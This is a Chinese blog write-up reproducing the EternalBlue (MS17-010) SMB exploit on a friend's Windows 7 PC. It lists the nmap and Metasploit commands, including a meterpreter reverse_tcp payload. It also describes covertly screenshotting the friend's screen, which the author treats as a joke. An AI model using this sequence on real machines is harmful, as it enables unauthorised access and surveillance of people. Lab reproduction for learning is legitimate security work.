记一次永恒之蓝漏洞复现

admin 2022年7月27日20:59:42评论66 views字数 928阅读3分5秒阅读模式

前言

测试已经过允许,本文仅供学习交流使用。永恒之蓝是Shadow Brokers在2017年公布的一个网络攻击工具,永恒之蓝利用了Windows系统的SMB(445端口)漏洞获取系统的权限。今天闲来无事,看了看朋友的电脑是win7的系统,于是我打算试一下这个漏洞的复现。


过程记录

1.首先使用nmap扫描局域网内所有开放了445端口的机器

记一次永恒之蓝漏洞复现

发现有这么多机器都在线,朋友的机器是138,其他的机器就不做测试了


2.接下来就是使用MSF进行漏洞利用了,在此之前,我们需要将kali虚拟机的网络模式设置成桥接模式,这样才能保证kali与朋友的机器在同一局域网内。

记一次永恒之蓝漏洞复现


3.接下来就是打开kali,使用MSF了。首先查找一下永恒之蓝的验证模块,验证一下朋友的机器是否存在漏洞。接下来图片的文字可能会很小,就委屈一下各位看官大人了。

search ms17-010 #查找永恒之蓝的验证模块

use 

auxiliary/scanner/ smb/smb__ms17_010 #使用这个模块

记一次永恒之蓝漏洞复现


4.设置朋友机器的局域网IP,并运行模块进行验证

set rhosts 10.10.30.138

run

记一次永恒之蓝漏洞复现

可以看到,结果显示138机器是可能存在永恒之蓝漏洞的,那么接下来就试一试利用吧


5.利用之前,先查看一下我的IP

ifconfig

记一次永恒之蓝漏洞复现

10.10.30.5与目标机器在同一网段


6.使用永恒之蓝的利用模块

use exploit/windows/smb/ms17_010_eternalblue

设置好payload

set payload 

windows/x64/meterpreter/reverse_tcp

设置攻击目标IP

set rhosts 10.10.30.138

设置监听IP

set lhost 10.10.30.5

监听端口就用默认的4444端口就好

查看一下是否设置完毕

show options

没有问题run直接运行起来

记一次永恒之蓝漏洞复现


7.反弹回来一个session,切换到D盘下,成功查看目录

记一次永恒之蓝漏洞复现


8.这里有一个骚操作,截图看看朋友在干什么

screenshot

记一次永恒之蓝漏洞复现

记一次永恒之蓝漏洞复现

这小子正在编程呢,哈哈哈     溜了溜了

更多文章请关注公众号:星河疯客admin

记一次永恒之蓝漏洞复现

万水千山总是情,点赞再走行不行的(ง •_•)ง

原文始发于微信公众号(星河疯客admin):记一次永恒之蓝漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月27日20:59:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次永恒之蓝漏洞复现http://cn-sec.com/archives/880953.html

发表评论

匿名网友 填写信息